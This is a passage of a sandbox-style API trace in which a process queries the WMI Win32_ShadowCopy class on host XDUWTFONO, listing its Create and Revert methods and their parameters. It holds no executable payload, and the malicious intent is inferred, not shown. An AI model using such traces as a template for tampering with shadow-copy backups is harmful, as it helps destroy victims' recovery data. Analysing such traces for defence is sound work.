puBuffLength=0x1c90d1e0*=0x0, pszName=0x0 | out: puBuffLength=0x1c90d1e0*=0x0, pszName=0x0) returned 0x8004103a [0108.870] WbemDefPath:IWbemPath:GetServer (in: This=0x1be490f0, puNameBufLength=0x1c90d1e0*=0x0, pName=0x0 | out: puNameBufLength=0x1c90d1e0*=0x0, pName=0x0) returned 0x80041009 [0108.870] WbemDefPath:IWbemPath:SetServer (This=0x1be490f0, Name="XDUWTFONO") returned 0x0 [0108.870] CoGetObjectContext (in: riid=0x1c90d048*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d040 | out: ppv=0x1c90d040*=0x142498) returned 0x0 [0108.870] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90d060 | out: pAptType=0x1c90d060*=1) returned 0x0 [0108.870] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90d168 | out: ppvObject=0x1c90d168*=0x0) returned 0x80004002 [0108.870] IUnknown:Release (This=0x142498) returned 0x1 [0108.870] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90c6d0 | out: ppv=0x1c90c6d0*=0x1be41bc0) returned 0x0 [0108.871] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be41bc0, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90c3e0 | out: ppvObject=0x1c90c3e0*=0x0) returned 0x80004002 [0108.871] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be41bc0, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c3c8 | out: ppvObject=0x1c90c3c8*=0x1be491b0) returned 0x0 [0108.871] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be491b0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c2d0 | out: ppvObject=0x1c90c2d0*=0x1be491b0) returned 0x0 [0108.871] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be491b0, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90c350 | out: ppvObject=0x1c90c350*=0x0) returned 0x80004002 [0108.871] WbemDefPath:IUnknown:AddRef (This=0x1be491b0) returned 0x3 [0108.871] CoGetContextToken (in: pToken=0x1c90bfa0 | out: pToken=0x1c90bfa0) returned 0x0 [0108.871] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be491b0, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90bf60 | out: ppvObject=0x1c90bf60*=0x1b929d60) returned 0x0 [0108.871] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b929d60, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90bf90 | out: pCid=0x1c90bf90*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0108.871] WbemDefPath:IUnknown:Release (This=0x1b929d60) returned 0x3 [0108.871] CoGetContextToken (in: pToken=0x1c90bf70 | out: pToken=0x1c90bf70) returned 0x0 [0108.871] WbemDefPath:IUnknown:AddRef (This=0x1be491b0) returned 0x4 [0108.871] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be491b0, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c088 | out: ppvObject=0x1c90c088*=0x0) returned 0x80004002 [0108.871] WbemDefPath:IUnknown:Release (This=0x1be491b0) returned 0x3 [0108.871] WbemDefPath:IUnknown:Release (This=0x1be491b0) returned 0x2 [0108.871] WbemDefPath:IUnknown:Release (This=0x1be41bc0) returned 0x0 [0108.871] WbemDefPath:IUnknown:Release (This=0x1be491b0) returned 0x1 [0108.872] CoGetContextToken (in: pToken=0x1c90cca0 | out: pToken=0x1c90cca0) returned 0x0 [0108.872] CoGetContextToken (in: pToken=0x1c90cbe0 | out: pToken=0x1c90cbe0) returned 0x0 [0108.872] WbemDefPath:IUnknown:AddRef (This=0x1be491b0) returned 0x2 [0108.872] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be491b0, riid=0x1c90cd20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90cd00 | out: ppvObject=0x1c90cd00*=0x1be491b0) returned 0x0 [0108.872] WbemDefPath:IUnknown:Release (This=0x1be491b0) returned 0x2 [0108.872] WbemDefPath:IUnknown:Release (This=0x1be491b0) returned 0x1 [0108.872] CoGetContextToken (in: pToken=0x1c90ce20 | out: pToken=0x1c90ce20) returned 0x0 [0108.872] CoGetContextToken (in: pToken=0x1c90cd60 | out: pToken=0x1c90cd60) returned 0x0 [0108.872] WbemDefPath:IUnknown:AddRef (This=0x1be491b0) returned 0x2 [0108.872] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be491b0, riid=0x1c90cea0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90ce80 | out: ppvObject=0x1c90ce80*=0x1be491b0) returned 0x0 [0108.872] WbemDefPath:IUnknown:Release (This=0x1be491b0) returned 0x2 [0108.872] WbemDefPath:IUnknown:AddRef (This=0x1be491b0) returned 0x3 [0108.872] WbemDefPath:IWbemPath:SetText (This=0x1be491b0, uMode=0x4, pszPath="ROOT\\cimv2") returned 0x0 [0108.872] WbemDefPath:IUnknown:Release (This=0x1be491b0) returned 0x2 [0108.872] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be490f0, puCount=0x1c90d140 | out: puCount=0x1c90d140*=0x0) returned 0x0 [0108.872] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be491b0, puCount=0x1c90d140 | out: puCount=0x1c90d140*=0x2) returned 0x0 [0108.872] WbemDefPath:IWbemPath:GetText (in: This=0x1be491b0, lFlags=16, puBuffLength=0x1c90d140*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d140*=0xb, pszText=0x0) returned 0x0 [0108.872] WbemDefPath:IWbemPath:GetText (in: This=0x1be491b0, lFlags=16, puBuffLength=0x1c90d140*=0xb, pszText="0000000000" | out: puBuffLength=0x1c90d140*=0xb, pszText="ROOT\\cimv2") returned 0x0 [0108.872] WbemDefPath:IWbemPath:RemoveAllNamespaces (This=0x1be490f0) returned 0x0 [0108.873] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be491b0, puCount=0x1c90d1a0 | out: puCount=0x1c90d1a0*=0x2) returned 0x0 [0108.873] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1be491b0, uIndex=0x0, puNameBufLength=0x1c90d1a0*=0x0, pName=0x0 | out: puNameBufLength=0x1c90d1a0*=0x5, pName=0x0) returned 0x0 [0108.873] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1be491b0, uIndex=0x0, puNameBufLength=0x1c90d1a0*=0x5, pName="0000" | out: puNameBufLength=0x1c90d1a0*=0x5, pName="ROOT") returned 0x0 [0108.873] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x1be490f0, uIndex=0x0, pszName="ROOT") returned 0x0 [0108.873] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1be491b0, uIndex=0x1, puNameBufLength=0x1c90d1a0*=0x0, pName=0x0 | out: puNameBufLength=0x1c90d1a0*=0x6, pName=0x0) returned 0x0 [0108.873] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x1be491b0, uIndex=0x1, puNameBufLength=0x1c90d1a0*=0x6, pName="00000" | out: puNameBufLength=0x1c90d1a0*=0x6, pName="cimv2") returned 0x0 [0108.873] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x1be490f0, uIndex=0x1, pszName="cimv2") returned 0x0 [0108.873] WbemDefPath:IWbemPath:GetClassName (in: This=0x1be490f0, puBuffLength=0x1c90d1e0*=0x0, pszName=0x0 | out: puBuffLength=0x1c90d1e0*=0x0, pszName=0x0) returned 0x8004103a [0108.873] WbemDefPath:IWbemPath:SetClassName (This=0x1be490f0, Name="Win32_ShadowCopy") returned 0x0 [0108.873] IWbemClassObject:BeginMethodEnumeration (This=0x1be45460, lEnumFlags=0) returned 0x0 [0108.873] IWbemClassObject:NextMethod (in: This=0x1be45460, lFlags=0, pstrName=0x1c90d178*=0x0, ppInSignature=0x1c90d170*=0x0, ppOutSignature=0x1c90d168*=0x0 | out: pstrName=0x1c90d178*="Create", ppInSignature=0x1c90d170*=0x1be4c0e0, ppOutSignature=0x1c90d168*=0x1be4c750) returned 0x0 [0108.873] SysStringLen (param_1="Create") returned 0x6 [0108.873] IWbemClassObject:NextMethod (in: This=0x1be45460, lFlags=0, pstrName=0x1c90d178*=0x0, ppInSignature=0x1c90d170*=0x0, ppOutSignature=0x1c90d168*=0x0 | out: pstrName=0x1c90d178*="Revert", ppInSignature=0x1c90d170*=0x1be4cac0, ppOutSignature=0x1c90d168*=0x1be4cfd0) returned 0x0 [0108.874] SysStringLen (param_1="Revert") returned 0x6 [0108.874] IWbemClassObject:NextMethod (in: This=0x1be45460, lFlags=0, pstrName=0x1c90d178*=0x0, ppInSignature=0x1c90d170*=0x0, ppOutSignature=0x1c90d168*=0x0 | out: pstrName=0x1c90d178*=0x0, ppInSignature=0x1c90d170*=0x0, ppOutSignature=0x1c90d168*=0x0) returned 0x40005 [0108.874] IWbemClassObject:EndMethodEnumeration (This=0x1be45460) returned 0x0 [0108.875] IWbemClassObject:GetMethod (in: This=0x1be45460, wszName="Create", lFlags=0, ppInSignature=0x1c90d168, ppOutSignature=0x1c90d160 | out: ppInSignature=0x1c90d168*=0x1be4d5e0, ppOutSignature=0x1c90d160*=0x1be4dc50) returned 0x0 [0108.875] IWbemClassObject:GetMethodQualifierSet (in: This=0x1be45460, wszMethod="Create", ppQualSet=0x1c90d160 | out: ppQualSet=0x1c90d160*=0x1be49730) returned 0x0 [0108.875] IWbemQualifierSet:Get (in: This=0x1be49730, wszName="static", lFlags=0, pVal=0x1c90d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c90d118*=0 | out: pVal=0x1c90d120*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), plFlavor=0x1c90d118*=0) returned 0x0 [0108.875] IWbemClassObject:GetMethodQualifierSet (in: This=0x1be45460, wszMethod="Create", ppQualSet=0x1c90d190 | out: ppQualSet=0x1c90d190*=0x1be4dfd0) returned 0x0 [0108.876] IWbemQualifierSet:Get (in: This=0x1be4dfd0, wszName="static", lFlags=0, pVal=0x1c90d150*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c90d148*=0 | out: pVal=0x1c90d150*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), plFlavor=0x1c90d148*=0) returned 0x0 [0108.877] IWbemClassObject:GetMethod (in: This=0x1be45460, wszName="Revert", lFlags=0, ppInSignature=0x1c90d168, ppOutSignature=0x1c90d160 | out: ppInSignature=0x1c90d168*=0x1be4e290, ppOutSignature=0x1c90d160*=0x1be4e790) returned 0x0 [0108.877] IWbemClassObject:GetMethodQualifierSet (in: This=0x1be45460, wszMethod="Revert", ppQualSet=0x1c90d160 | out: ppQualSet=0x1c90d160*=0x1be4eb00) returned 0x0 [0108.877] IWbemQualifierSet:Get (in: This=0x1be4eb00, wszName="static", lFlags=0, pVal=0x1c90d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c90d118*=0 | out: pVal=0x1c90d120*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c90d118*=0) returned 0x80041002 [0108.877] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x1c90d168 | out: pperrinfo=0x1c90d168*=0x0) returned 0x1 [0108.877] CoGetClassObject (in: rclsid=0x1b920878*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90cdd0 | out: ppv=0x1c90cdd0*=0x1be41d40) returned 0x0 [0108.878] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1be41d40, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cae0 | out: ppvObject=0x1c90cae0*=0x0) returned 0x80004002 [0108.878] WbemStatusCodeText:IClassFactory:CreateInstance (in: This=0x1be41d40, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cac8 | out: ppvObject=0x1c90cac8*=0x1be41d60) returned 0x0 [0108.878] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1be41d60, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c9d0 | out: ppvObject=0x1c90c9d0*=0x1be41d60) returned 0x0 [0108.878] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1be41d60, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90ca50 | out: ppvObject=0x1c90ca50*=0x0) returned 0x80004002 [0108.878] WbemStatusCodeText:IUnknown:AddRef (This=0x1be41d60) returned 0x3 [0108.878] CoGetContextToken (in: pToken=0x1c90c6a0 | out: pToken=0x1c90c6a0) returned 0x0 [0108.878] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1be41d60, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c660 | out: ppvObject=0x1c90c660*=0x0) returned 0x80004002 [0108.878] CoGetContextToken (in: pToken=0x1c90c670 | out: pToken=0x1c90c670) returned 0x0 [0108.878] WbemStatusCodeText:IUnknown:AddRef (This=0x1be41d60) returned 0x4 [0108.878] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1be41d60, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90c788 | out: ppvObject=0x1c90c788*=0x0) returned 0x80004002 [0108.878] WbemStatusCodeText:IUnknown:Release (This=0x1be41d60) returned 0x3 [0108.879] WbemStatusCodeText:IUnknown:Release (This=0x1be41d60) returned 0x2 [0108.879] WbemStatusCodeText:IUnknown:Release (This=0x1be41d40) returned 0x0 [0108.879] WbemStatusCodeText:IUnknown:Release (This=0x1be41d60) returned 0x1 [0108.879] CoGetContextToken (in: pToken=0x1c90cc90 | out: pToken=0x1c90cc90) returned 0x0 [0108.879] CoGetContextToken (in: pToken=0x1c90cbd0 | out: pToken=0x1c90cbd0) returned 0x0 [0108.879] WbemStatusCodeText:IUnknown:AddRef (This=0x1be41d60) returned 0x2 [0108.879] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1be41d60, riid=0x1c90cd10*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppvObject=0x1c90ccf0 | out: ppvObject=0x1c90ccf0*=0x1be41d60) returned 0x0 [0108.879] WbemStatusCodeText:IUnknown:Release (This=0x1be41d60) returned 0x2 [0108.879] WbemStatusCodeText:IUnknown:Release (This=0x1be41d60) returned 0x1 [0108.879] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0108.879] CoGetContextToken (in: pToken=0x1c90cd50 | out: pToken=0x1c90cd50) returned 0x0 [0108.879] WbemStatusCodeText:IUnknown:AddRef (This=0x1be41d60) returned 0x2 [0108.879] WbemStatusCodeText:IUnknown:QueryInterface (in: This=0x1be41d60, riid=0x1c90ce90*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppvObject=0x1c90ce70 | out: ppvObject=0x1c90ce70*=0x1be41d60) returned 0x0 [0108.879] WbemStatusCodeText:IUnknown:Release (This=0x1be41d60) returned 0x2 [0108.879] WbemStatusCodeText:IUnknown:AddRef (This=0x1be41d60) returned 0x3 [0108.880] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x1be41d60, hRes=0xffffffff80041002, LocaleId=0x0, lFlags=1, MessageText=0x1c90d148 | out: MessageText=0x1c90d148*="Not found ") returned 0x0 [0108.880] WbemStatusCodeText:IUnknown:Release (This=0x1be41d60) returned 0x2 [0108.880] SysStringLen (param_1="Not found ") returned 0xa [0108.884] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be490f0, puCount=0x1c90d260 | out: puCount=0x1c90d260*=0x2) returned 0x0 [0108.884] WbemDefPath:IWbemPath:GetText (in: This=0x1be490f0, lFlags=4, puBuffLength=0x1c90d260*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d260*=0x28, pszText=0x0) returned 0x0 [0108.884] WbemDefPath:IWbemPath:GetText (in: This=0x1be490f0, lFlags=4, puBuffLength=0x1c90d260*=0x28, pszText="000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d260*=0x28, pszText="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ShadowCopy") returned 0x0 [0108.885] IWbemClassObject:GetMethod (in: This=0x1be45460, wszName="Revert", lFlags=0, ppInSignature=0x1c90d128, ppOutSignature=0x1c90d120 | out: ppInSignature=0x1c90d128*=0x1be4edc0, ppOutSignature=0x1c90d120*=0x1be4f2c0) returned 0x0 [0108.885] IWbemClassObject:GetNames (in: This=0x1be4edc0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x1c90d098*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c90d090 | out: pNames=0x1c90d090*="\x01ƀ\x08") returned 0x0 [0108.885] SafeArrayGetDim (psa=0x1b927fd0) returned 0x1 [0108.886] IWbemClassObject:Get (in: This=0x1be4edc0, wszName="ForceDismount", lFlags=0, pVal=0x1c90d090*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d08c*=0, plFlavor=0x1c90d088*=0 | out: pVal=0x1c90d090*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c90d08c*=11, plFlavor=0x1c90d088*=0) returned 0x0 [0108.886] IWbemClassObject:Get (in: This=0x1be4edc0, wszName="ForceDismount", lFlags=0, pVal=0x1c90d040*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d03c*=11, plFlavor=0x1c90d038*=0 | out: pVal=0x1c90d040*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c90d03c*=11, plFlavor=0x1c90d038*=0) returned 0x0 [0108.886] IWbemClassObject:Get (in: This=0x1be4edc0, wszName="ForceDismount", lFlags=0, pVal=0x1c90d040*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d03c*=11, plFlavor=0x1c90d038*=0 | out: pVal=0x1c90d040*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c90d03c*=11, plFlavor=0x1c90d038*=0) returned 0x0 [0108.887] IWbemClassObject:Get (in: This=0x1be4edc0, wszName="ForceDismount", lFlags=0, pVal=0x1c90d040*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d03c*=11, plFlavor=0x1c90d038*=0 | out: pVal=0x1c90d040*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c90d03c*=11, plFlavor=0x1c90d038*=0) returned 0x0 [0108.888] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1be4edc0, wszProperty="ForceDismount", ppQualSet=0x1c90d0d0 | out: ppQualSet=0x1c90d0d0*=0x1be4f630) returned 0x0 [0108.889] IWbemQualifierSet:Get (in: This=0x1be4f630, wszName="ID", lFlags=0, pVal=0x1c90d090*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c90d088*=0 | out: pVal=0x1c90d090*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c90d088*=17) returned 0x0 [0108.889] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1be4edc0, wszProperty="ForceDismount", ppQualSet=0x1c90d100 | out: ppQualSet=0x1c90d100*=0x1be4f6b0) returned 0x0 [0108.889] IWbemQualifierSet:Get (in: This=0x1be4f6b0, wszName="ID", lFlags=0, pVal=0x1c90d0c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c90d0b8*=17 | out: pVal=0x1c90d0c0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c90d0b8*=17) returned 0x0 [0108.891] IWbemClassObject:GetMethod (in: This=0x1be45460, wszName="Revert", lFlags=0, ppInSignature=0x1c90d0c8, ppOutSignature=0x1c90d0c0 | out: ppInSignature=0x1c90d0c8*=0x1be4f950, ppOutSignature=0x1c90d0c0*=0x1be4fe50) returned 0x0 [0108.891] IWbemClassObject:GetNames (in: This=0x1be4f950, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x1c90d038*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c90d030 | out: pNames=0x1c90d030*="\x01ƀ\x08") returned 0x0 [0108.891] SafeArrayGetDim (psa=0x1b927f50) returned 0x1 [0108.892] IWbemClassObject:Get (in: This=0x1be4f950, wszName="ForceDismount", lFlags=0, pVal=0x1c90d030*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d02c*=0, plFlavor=0x1c90d028*=0 | out: pVal=0x1c90d030*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c90d02c*=11, plFlavor=0x1c90d028*=0) returned 0x0 [0108.892] IWbemClassObject:Get (in: This=0x1be4f950, wszName="ForceDismount", lFlags=0, pVal=0x1c90cfe0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90cfdc*=11, plFlavor=0x1c90cfd8*=0 | out: pVal=0x1c90cfe0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c90cfdc*=11, plFlavor=0x1c90cfd8*=0) returned 0x0 [0108.892] IWbemClassObject:Get (in: This=0x1be4f950, wszName="ForceDismount", lFlags=0, pVal=0x1c90cfe0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90cfdc*=11, plFlavor=0x1c90cfd8*=0 | out: pVal=0x1c90cfe0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c90cfdc*=11, plFlavor=0x1c90cfd8*=0) returned 0x0 [0108.892] IWbemClassObject:Get (in: This=0x1be4f950, wszName="ForceDismount", lFlags=0, pVal=0x1c90cfe0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90cfdc*=11, plFlavor=0x1c90cfd8*=0 | out: pVal=0x1c90cfe0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pType=0x1c90cfdc*=11, plFlavor=0x1c90cfd8*=0) returned 0x0 [0108.893] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1be4f950, wszProperty="ForceDismount", ppQualSet=0x1c90d070 | out: ppQualSet=0x1c90d070*=0x1be501c0) returned 0x0 [0108.895] IWbemQualifierSet:Get (in: This=0x1be501c0, wszName="ID", lFlags=0, pVal=0x1c90d030*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c90d028*=0 | out: pVal=0x1c90d030*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c90d028*=17) returned 0x0 [0108.895] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1be4f950, wszProperty="ForceDismount", ppQualSet=0x1c90d0a0 | out: ppQualSet=0x1c90d0a0*=0x1be50240) returned 0x0 [0108.895] IWbemQualifierSet:Get (in: This=0x1be50240, wszName="ID", lFlags=0, pVal=0x1c90d060*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c90d058*=17 | out: pVal=0x1c90d060*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x1c90d058*=17) returned 0x0 [0108.897] IWbemClassObject:GetMethod (in: This=0x1be45460, wszName="Revert", lFlags=0, ppInSignature=0x1c90d0c8, ppOutSignature=0x1c90d0c0 | out: ppInSignature=0x1c90d0c8*=0x1be504e0, ppOutSignature=0x1c90d0c0*=0x1be509e0) returned 0x0 [0108.897] IWbemClassObject:Get (in: This=0x1be504e0, wszName="ForceDismount", lFlags=0, pVal=0x1c90d0b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), 